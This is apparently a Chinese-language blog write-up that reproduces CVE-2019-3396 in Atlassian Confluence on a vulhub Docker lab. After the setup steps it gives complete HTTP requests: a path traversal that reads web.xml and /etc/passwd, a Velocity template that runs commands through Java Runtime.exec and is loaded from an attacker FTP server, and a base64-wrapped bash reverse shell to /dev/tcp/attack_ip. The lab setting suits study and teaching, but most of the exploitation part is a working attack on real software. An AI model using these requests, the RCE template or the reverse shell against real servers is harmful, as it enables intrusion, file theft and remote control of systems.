其他分享
首页 > 其他分享> > CVE-2019-3396 Atlassian Confluence 路径穿越与命令执行漏洞复现

CVE-2019-3396 Atlassian Confluence 路径穿越与命令执行漏洞复现

作者:互联网

CVE-2019-3396 Atlassian Confluence 路径穿越与命令执行漏洞

0x01.环境搭建

利用vulnhub搭建漏洞靶场

service docker start
docker-compose up -d

image-20210405131226871

查看开启的端口

docker-compose ps

image-20210405131259176

分别监听了数据库端口和web端口

访问http://target_ip:8090会进入安装引导,选择“Trial installation”,之后会要求填写license key。点击Get an evaluation license,去Atlassian官方申请一个Confluence Server的测试证书(不要选择Data Center和Addons,记得选择not installed yet)

image-20210405132424172

之后它会自动跳转到原页面并将证书自动填好

image-20210405132849491

然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。

如果提示填写cluster node,路径填写/home/confluence即可

image-20210405133115909

后续可能要求你填写数据库账号密码,选择postgres数据库,地址为db,账号密码均为postgres

image-20210405133348226

接下来的内容随意选择填写

image-20210405133724371

image-20210405133752765

image-20210405133824058

image-20210405133849127

image-20210405133956441

0x02.漏洞复现

路径穿越

发送如下数据包即可读取文件web.xml

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: target_ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://target_ip:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

我是先抓了一个包后自己改了一下

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: target_ip:8090
Content-Length: 168
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Content-Type: application/json
Origin: http://target_ip:8090
Referer: http://target_ip:8090/collector/pages.action?key=SPC
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; JSESSIONID=232F54EFE4F60A79C8BCE610F69B43AF; seraph.confluence=524289%3A48e4dbe7a203952e4258c9a5ff33e5d0ada6196c
Connection: close

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

成功读取web,xml

image-20210405134837821

image-20210405135038930

6.12以前的Confluence没有限制文件读取的协议和路径,修改请求中_template参数的值,即可实现本地文件包含,我们可以使用file:///etc/passwd来读取文件

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: target_ip:8090
Content-Length: 176
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Content-Type: application/json
Origin: http://target_ip:8090
Referer: http://target_ip:8090/collector/pages.action?key=SPC
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; JSESSIONID=232F54EFE4F60A79C8BCE610F69B43AF; seraph.confluence=524289%3A48e4dbe7a203952e4258c9a5ff33e5d0ada6196c
Connection: close

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"file:///etc/passwd"}}}

image-20210405135244811

远程代码执行漏洞

修改请求中_template参数的值,可以包含远程文件,支持https协议,http目前无法利用

用python3 -m pyftpdlib -p port开启一个简单的ftp服务器

python3 -m pip install pyftpdlib
python3 -m pyftplib -p 8888

image-20210405151414404

root目录下添加一个r.vm文件,内容为

#set ($exp="exp")
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))
#set ($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $exp.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
    $scan.next()
#end

修改_template参数的值为ftp://attack_ip:8888/r.vm并在其后加入command值,设置为id

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: target_ip:8090
Content-Length: 176
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Content-Type: application/json
Origin: http://target_ip:8090
Referer: http://target_ip:8090/collector/pages.action?key=SPC
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; JSESSIONID=232F54EFE4F60A79C8BCE610F69B43AF; seraph.confluence=524289%3A48e4dbe7a203952e4258c9a5ff33e5d0ada6196c
Connection: close

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://attack:8888/r.vm","command":"id"}}}

发送后成功执行命令

image-20210405145638387

尝试反弹shell

使用base64编码来绕后java的机制,将command值换为base64的payload

http://jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/attack_ip/port 0>&1 #反弹shell
base64
bash -c {echo,payload的base64编码}|{base64,-d}|{bash,-i}

image-20210405150029928

在攻击机上监听7777端口,发送数据包后成功反弹shell

image-20210405150050551

标签:en,http,target,8090,ip,3396,Atlassian,Accept,Confluence
来源: https://www.cnblogs.com/-Anguvia-/p/14618509.html